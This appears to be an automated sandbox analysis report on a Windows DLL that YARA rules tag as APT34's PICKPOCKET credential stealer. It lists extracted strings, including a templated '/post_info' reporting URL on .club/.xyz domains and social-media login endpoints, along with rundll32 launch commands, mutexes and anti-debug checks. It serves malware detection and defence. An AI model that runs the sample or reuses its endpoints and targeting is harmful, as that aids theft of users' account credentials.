Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://ocsp.digicert.com0P
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://ocsp.digicert.com0R
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: A8xYhQFvXo.dllString found in binary or memory: http://www.interestvideo.com/video1.php
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.
Source: A8xYhQFvXo.dllString found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: A8xYhQFvXo.dllString found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: A8xYhQFvXo.dllString found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://ads.google.com/nav/selectaccount
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: A8xYhQFvXo.dllString found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: rundll32.exe, 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235936438.0000000010171000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245392829.0000000010171000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://twitter.com/
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: A8xYhQFvXo.dllString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://twitter.com/ookie:
Source: A8xYhQFvXo.dllString found in binary or memory: https://twitter.comReferer:
Source: A8xYhQFvXo.dllString found in binary or memory: https://twitter.comsec-fetch-dest:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.digicert.com/CPS0
Source: A8xYhQFvXo.dllString found in binary or memory: https://www.instagram.com/
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.instagram.com/accept:
Source: A8xYhQFvXo.dllString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: A8xYhQFvXo.dllString found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.messenger.com
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.messenger.com/
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.messenger.com/accept:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.messenger.com/login/nonce/
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.messenger.com/login/nonce/ookie:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllString found in binary or memory: https://www.messenger.com/origin:

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: A8xYhQFvXo.dll, type: SAMPLEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 1.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 7.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10033BFE1_2_10033BFE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10023C511_2_10023C51
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_1002E58A1_2_1002E58A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10042F701_2_10042F70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_100407801_2_10040780
Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 712
Source: A8xYhQFvXo.dllStatic PE information: Resource name: CRX type: 7-zip archive data, version 0.3
Source: A8xYhQFvXo.dllStatic PE information: Resource name: FF type: 7-zip archive data, version 0.3
Source: A8xYhQFvXo.dllStatic PE information: Resource name: FRIENDS type: 7-zip archive data, version 0.3
Source: A8xYhQFvXo.dllBinary or memory string: OriginalFilenameFsFilter.sys vs A8xYhQFvXo.dll
Source: A8xYhQFvXo.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: A8xYhQFvXo.dll, type: SAMPLEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 00000004.00000002.236067014.000000001028B000.00000008.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000007.00000002.245505715.000000001028B000.00000008.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 1.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 4.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 7.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: A8xYhQFvXo.dllStatic PE information: Section: .rsrc ZLIB complexity 0.999259599673
Source: classification engineClassification label: mal60.winDLL@10/12@0/0
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6896
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6652
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7004
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DB2.tmpJump to behavior
Source: A8xYhQFvXo.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello001
Source: A8xYhQFvXo.dllVirustotal: Detection: 17%
Source: A8xYhQFvXo.dllMetadefender: Detection: 18%
Source: A8xYhQFvXo.dllReversingLabs: Detection: 44%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\A8xYhQFvXo.dll'
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello001
Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 712
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello002
Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 712
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello003
Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 712
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello001Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello002Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello003Jump to behavior
Source: A8xYhQFvXo.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: A8xYhQFvXo.dllStatic file information: File size 4890624 > 1048576
Source: A8xYhQFvXo.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x170000
Source: A8xYhQFvXo.dllStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x118000
Source: A8xYhQFvXo.dllStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x179000
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Source: A8xYhQFvXo.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: A8xYhQFvXo.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: A8xYhQFvXo.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: A8xYhQFvXo.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: A8xYhQFvXo.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10037541 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,1_2_10037541
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_1002EB91 push ecx; ret 1_2_1002EBA4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10028D9A push ecx; ret 1_2_10028DAD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_1014BE00 _memset,SHGetSpecialFolderPathA,_strcat_s,PathFileExistsA,_memset,GetPrivateProfileStringA,_strlen,_strlen,PathRemoveFileSpecA,_strcat_s,_strcat_s,PathFileExistsA,PathFindFileNameA,1_2_1014BE00
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10147900 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,1_2_10147900
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10145A40 FindFirstFileA,FindClose,1_2_10145A40
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10023315 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_10023315
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10037541 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,1_2_10037541
